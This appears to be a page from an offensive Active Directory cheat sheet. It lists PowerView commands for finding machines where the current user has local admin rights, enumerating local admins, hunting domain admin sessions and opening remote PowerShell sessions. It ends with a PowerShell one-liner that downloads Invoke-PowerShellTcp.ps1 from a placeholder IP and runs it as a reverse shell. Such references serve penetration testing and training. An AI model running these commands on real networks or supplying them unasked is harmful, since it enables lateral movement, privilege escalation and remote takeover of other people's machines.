9️⃣Miscellaneous Enumeration
Powerview Find all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose. ./Find-WMILocalAdminAccess.ps1
Find-WMILocalAdminAccess. ./Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccessPowerview Find local admins on all machines of the domain (needs admin privs)
Invoke-EnumerateLocalAdmin -VerboseConnect to machine with administrator privs
Enter-PSSession -Computername <computername>Save and use sessions of a machine
$sess = New-PSSession -Computername <computername>
Enter-PSSession $sessFind active sessions
Invoke-UserHunter
Invoke-UserHunter -Groupname "RDPUsers"Find active sessions of domain admins
Invoke-UserHunter -Groupname "Domain Admins"Check access to machine
Invoke-UserHunter -CheckAccessPowershell reverse shell
Powershell.exe iex (iwr http://xx.xx.xx.xx/Invoke-PowerShellTcp.ps1 -UseBasicParsing);reverse -Reverse -IPLast updated
Was this helpful?